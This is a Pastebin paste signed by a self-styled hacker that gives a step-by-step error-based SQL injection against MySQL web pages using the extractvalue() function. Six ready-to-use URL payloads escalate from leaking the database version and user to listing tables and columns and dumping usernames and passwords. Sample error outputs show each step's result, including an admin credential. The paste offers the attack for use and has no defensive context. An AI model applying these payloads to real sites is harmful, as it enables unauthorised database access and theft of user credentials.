Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <===============Hacker zurael sTz===============>
- =================twitter=============================
- https://twitter.com/zurael_stz
- =================facebook============================
- https://www.facebook.com/sTzisrael/
- =====================================================
- =================telegram============================
- https://telegram.me/joinchat/BL8GnT_yQscC-6gBMuCW_w
- =====================================================
- <===============Hacker zurael sTz===============>
- SQL injection using the xml function extractvalue() to extract data
- 1 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))--
- Result:
- 'Xpath syntax error: 5.5.9:user@localhost'
- 2 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 85,1)))--
- Result:
- 'Xpath syntax error: :users'
- 3 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1050,1)))--
- Result:
- 'Xpath syntax error: :username'
- 4 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1150,1)))--
- Result:
- 'Xpath syntax error: :password'
- 5 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users)))--
- Result:
- 'Xpath syntax error: :Admin:password1'
- OR
- 6 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users limit 1,1)))--
- #zurael_sTz
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement